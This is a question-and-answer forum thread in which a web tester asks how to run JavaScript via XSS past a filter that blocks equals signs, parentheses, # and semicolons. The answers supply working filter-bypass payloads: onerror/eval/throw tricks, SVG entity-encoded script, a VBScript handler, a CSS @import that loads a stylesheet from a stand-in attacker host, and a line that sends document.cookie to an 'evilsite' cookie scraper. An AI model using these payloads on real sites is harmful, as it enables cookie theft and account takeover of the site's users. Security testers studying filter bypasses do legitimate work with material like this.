# Cross Site Scripting without special chars

Tags: web-application, javascript, xss

I'm testing a web application and I found a XSS vulnerability. I can break a tag and inject some code to the application but nothing potentialy dangerous for the client.

The application has a filter wich detects special characters and some strings, as well I can bypass the filter for the string recognition injecting null values (< scr%00ipt> ) between its chars, but I can't figure out how to bypass it for a single character.

```
Allowed chars: :  / & @ - { } < > \ . , ' "
Disallowed chars: = ( ) # ;
```

The filter does not use character conversion and when something disallowed is detected it displays an error message: *Invalid Parameters detected*

Maybe I'm missing something but today I don't see how to execute javascript under this conditions. Any idea?

Comment: Have you tried encoding the brackets?

Comment: Yes but %28 or %29 is also detected and &#xXX is not valid because # is not an allowed character.

Comment: I updated my post.

Answer (score 23):

Yes, this is possible. There's a trick you can do with `onerror`:

```
<img src=x onerror=eval;throw'=alert\x281\x29';>
```

The `throw` generates a JavaScript string which is then passed back into `eval` because the `throw` constitutes an error. This gives you full arbitrary JavaScript injection.

---

OK, so you say we can't use an equals sign. Instead, I suggest this trick:

```
"><style>@import'http://evil.example.com/xss.css';</style>
```

This includes a 3rd party CSS file into the page. From there you can launch JavaScript:

```
body {
    background-image: url('javascript:alert(document.cookie);')
}
```

There are also [other tricks you can use](https://stackoverflow.com/questions/476276/using-javascript-in-css) to gain JavaScript execution from CSS.

Comment: As I said to Rook, the equal character is also filtered so I cant use this method, there is a list of allowed characters in the question.

Comment: @Nucklear Did you edit? I don't remember seeing the equals sign the first time around...

Comment: I didn't. Also OT, I'm trying to inyect through CSS but I can't do it without the disallowed characters...

Comment: @Nucklear I've added a second method using off-site CSS, with no `=` or parenths.

Comment: @Pilynomial Parenthesis not allowed :b I already tried this but thanks for the response.

Comment: @Nucklear There are no parentheses in the injected code. The CSS file is stored on a 3rd party site and will therefore not be subject to the WAF filters. The bottom code I showed was meant to be the contents of `xss.css`

Comment: Yes I realized that before posting the reply. I'm trying this solution but the inyected code has a semicolon which I just realized that is not valid, but removing the semicolon the css is injected but not executed. I can see it with firebug but does not work, I'm working on solving this now.

Comment: This is the result of the execution of the code: `    background-image: url("javascript:alert(document.cookie);
    background-color: black;
}` The background turns black but the quotes are moved from single quotes to a quite at the begining and the JS is not executed.

Comment: let us [continue this discussion in chat](http://chat.stackexchange.com/rooms/8995/discussion-between-polynomial-and-nucklear)

Comment: But this technique not work with Asp.net application.

Comment: @TAHATEMURII ASP.NET shouldn't make any difference; the problem is that most browsers disabled this trick.

Comment: Would you mind updating the answer if you find the time? Currently, none of your suggestions work in current browsers.

Answer (score 19):

Blocking parenthesis is strange,  I am not aware of any attack that this prevents.  [XSS without parenthesis is possible](http://sla.ckers.org/forum/read.php?2,20954).

For browsers that [support svg](http://jsfiddle.net/ZgPY4/2/):

```
<svg>
    <script>alert&#40/1/.source&#41</script>
</svg>
```

If you just want a simple PoC then this should work:

```
<script>onerror=alert;throw 1;</script>
```

But a real world exploit doesn't require parenthesis:

```
document.location='http://evilsite/cookie_scraper.php?cookie='+document.cookie
```

Comment: Hi @Rook, thanks for the response but I already tried this, the problem is that the equals symbol is also filtered and it doesn't work.

Comment: @Rook, you seem to know *a ton* on security issues. Just wondering... how old are you btw?

Comment: For the POC, the `throw 1` works, but why is the `alert` there? It doesn't seem to do anything.

Comment: the PoC should actually look like this: `<script>onerror=alert;throw 1;</script>`. you're registering alert as a global error-callback and then throw an error (causing alert to be called)

Comment: @TomTasche ah, that makes sense, thanks for the explanation, updated.

Answer (score 2):

Simple trick with VBScript: `<input onfocus=vbs:msgbox+1>`  [works in IE]

Answer (score 0):

How about if all the special characters are filtered out. I am testing a site which does not allow to enter special chars to be entered in search bar.